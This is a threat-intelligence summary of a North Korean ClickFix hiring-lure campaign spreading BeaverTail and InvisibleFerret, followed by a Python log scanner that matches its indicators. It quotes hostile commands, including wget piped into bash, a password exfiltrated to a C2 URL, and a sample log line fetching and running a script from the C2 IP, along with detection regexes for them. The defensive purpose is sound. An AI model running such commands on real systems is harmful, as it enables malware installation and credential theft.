BeaverTail Distributed with ClickFix Lure

North Korean operators used ClickFix lures on a fake hiring site to distribute compiled BeaverTail and InvisibleFerret payloads beginning in May 2025, shifting targeting toward marketing and trading roles and delivering binaries bundled with pkg and PyInstaller. The campaign used infrastructure including businesshire[.]top, nvidiasdk.fly[.]dev, and C2 172.86.93.139 and shows testing artifacts and low-scale deployment to date. #BeaverTail #InvisibleFerret

Keypoints

  • North Korean threat actors (tracked as Contagious Interview / Famous Chollima) distributed BeaverTail and InvisibleFerret since at least May 2025 using a ClickFix-based fake hiring site (businesshire[.]top).
  • The campaign shifts targeting from software developers to marketing and cryptocurrency trader roles and impersonates a US ecommerce retailer, broadening victim profiles.
  • Payloads were delivered as compiled executables (pkg, PyInstaller) for macOS and Windows rather than only JavaScript/Python scripts, improving execution on non-developer systems.
  • The threat actor used header-based guardrails and decoy payloads from nvidiasdk.fly[.]dev to evade automated detection and sandbox analysis.
  • macOS, Windows, and Linux infection chains differ: macOS uses a malicious installer and preinstall script, Windows uses an archive with update.vbs and nvidiasdk.exe, and Linux pipes scripts to bash to run a JavaScript BeaverTail.
  • Malware uses C2 172.86.93.139 and campaign identifier tttttt; samples show low static detection but clear network/file behavior when executed.
  • Operational artifacts (hard-coded allowlist IPs, GitHub commits, and developer handles) indicate testing activity and linkages to repositories RominaMabelRamirez/dify and RominaMabelRamirez/hflix.

MITRE Techniques

  • [T1204] User Execution – ClickFix lures presented fake troubleshooting/captcha and instructed users to run OS-specific commands to download and execute payloads (“…troubleshooting instructions contain an operating system-specific command to execute a subsequent stage via the system command line…”).
  • [T1105] Ingress Tool Transfer – The ClickFix commands download payloads from nvidiasdk.fly[.]dev and GitHub (RominaMabelRamirez repositories) to transfer BeaverTail/InvisibleFerret binaries (“…downloads an installer package from the threat actor’s backend… downloads two additional unsigned Mach-O binaries from the same branch and repository…”).
  • [T1059] Command and Scripting Interpreter – Linux chain pipes a remote script into bash to install node and run BeaverTail JavaScript (“…uses wget to download a script file, which is piped directly into bash… installs node via the nvm-sh installer script… executes the payload with the command node ~/.linvidia 2>&1 &”).
  • [T1202] Indirect Command Execution – The macOS installer uses a preinstall script to run further scripts and binaries, leveraging installer preinstall hooks to execute malicious actions (“…installer package… contains no payload data and only serves to execute a preinstall script named preinstall… downloads and attempts to execute a bash script named downx64.sh…”).
  • [T1041] Exfiltration Over C2 Channel – The preinstall script attempts to exfiltrate a password variable to a remote URL hxxp[:]//172.86.93[.]139:3000/pawr/ (“…attempts to read a user’s password from the variable MY_PASWOR in the file ~/.myvars and exfiltrate it to a remote IP address, hxxp[:]//172.86.93[.]139:3000/pawr/.”).
  • [T1036] Masquerading – The campaign used a fake hiring site and named packages/executables (e.g., com.nvidiahpc.pkg, nvidiasdk.exe, signed Nvidia Broadcast decoy) to appear legitimate (“…installer for a package named com.nvidiahpc.pkg… benign VisualBasic script file and a legitimate, signed Nvidia Broadcast executable…”).
  • [T1113] Screen Capture – BeaverTail and InvisibleFerret steal browser and system credentials and request video responses as part of the lure to induce actions and capture data (“…BeaverTail infections steal sensitive cryptocurrency wallet data and browser and system credentials then load a second stage… Application pages … prompt to record a short video response…”).

Indicators of Compromise

  • [Domain] fake hiring site and backend – businesshire[.]top, nvidiasdk.fly[.]dev
  • [IP] command and control and actor origin – 172.86.93[.]139 (C2 for BeaverTail/InvisibleFerret), 188.43.33[.]250 (observed actor origin)
  • [File Hash SHA256] macOS/Windows/Linux malware samples – 25c9fc5c5564a74430b92cb658d43e441dee1b3c0f692dc2571ac2918efa9a52 (x64nvidia BeaverTail Mach-O), e79b827b3cc29e940736dc20cc9c25958c0b09c25fc0bc8aacbd6365f38db71f (nvidiasdk.exe BeaverTail PE), 4a1588e27a3f322e94e490173fe2bfa8d6e2f407b81a77af8787619b0d3d10bd (linvidia BeaverTail JS)
  • [File Hash SHA256] supporting/installer files – 05ae07783d30b37aa5f0ffff86adde57d0d497fe915537a3fc010230b54e1ee8 (nvidia.pkg), 247fdba5fbfd076d9c530d937406aa097d6794b9af26bfc64bf6ea765ed51a50 (preinstall script)
  • [Persona] GitHub handles and emails – RominaMabelRamirez (repo owner), Yash-1511 (Git identity, [email protected]), dmytroviv1 (repo committer, [email protected])
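To turn the indicators and the chain behaviours above into something a responder can run, here is an added example (not from the tech note or from GitLab's tooling) that scans log lines for the network IoCs listed and for the host-side commands described for the Linux, macOS and Windows chains; the regexes and the sample log lines are this example's own approximations and constructed data, not observed telemetry.

```python
import re

# Network indicators from this tech note (the note defangs them; refanged here for matching).
NETWORK_IOCS = {
    "businesshire.top": "fake hiring site",
    "nvidiasdk.fly.dev": "payload and decoy backend",
    "172.86.93.139": "BeaverTail/InvisibleFerret C2",
}
# Host-side behaviours described for the three chains; regexes are this example's own
# approximations of the commands quoted in the note, not signatures from the note.
BEHAVIOUR_PATTERNS = [
    (re.compile(r"\bwget\b.*\|\s*bash\b"), "remote script piped into bash (Linux chain)"),
    (re.compile(r"\bnode\s+~/\.linvidia\b"), "BeaverTail JS run from ~/.linvidia"),
    (re.compile(r"~/\.myvars\b"), "preinstall script reading ~/.myvars"),
    (re.compile(r"com\.nvidiahpc\.pkg|\bnvidia\.pkg\b"), "malicious macOS installer package"),
    (re.compile(r"\bupdate\.vbs\b|\bnvidiasdk\.exe\b"), "Windows archive contents"),
]

def scan_line(line):
    """Return every IoC or behaviour label that matches one log line."""
    hits = []
    lowered = line.lower()
    for ioc, label in NETWORK_IOCS.items():
        # Boundaries stop 172.86.93.139 matching 172.86.93.1390 while still
        # matching subdomains such as www.businesshire.top.
        if re.search(r"(?<![\w-])" + re.escape(ioc) + r"(?![\w-])", lowered):
            hits.append(f"ioc:{ioc} ({label})")
    for pattern, label in BEHAVIOUR_PATTERNS:
        if pattern.search(line):
            hits.append(f"behaviour:{label}")
    return hits

def scan_log(lines):
    """Return (line number, line, labels) for every line with at least one hit."""
    findings = []
    for number, line in enumerate(lines, start=1):
        hits = scan_line(line)
        if hits:
            findings.append((number, line, hits))
    return findings

# Constructed sample records (not from the note) mixing proxy and shell-audit lines.
SAMPLE_LOG = [
    "proxy 10.0.0.5 GET http://nvidiasdk.fly.dev/downx64.sh",
    'audit EXECVE a0="bash" a1="-c" a2="wget -qO- http://172.86.93.139:3000/s.sh | bash"',
    "shell node ~/.linvidia 2>&1 &",
    "proxy 10.0.0.7 GET https://jobs.example.com/apply",
]

if __name__ == "__main__":
    for number, line, hits in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
```

The two lookups are deliberately separate: a network hit on its own is worth a ticket, while a behaviour hit such as `node ~/.linvidia` on an endpoint that never contacted the listed infrastructure is the signal to pull the host for forensics rather than to wait for C2 traffic.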


Read more: https://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/north-korean-malware-sept-2025/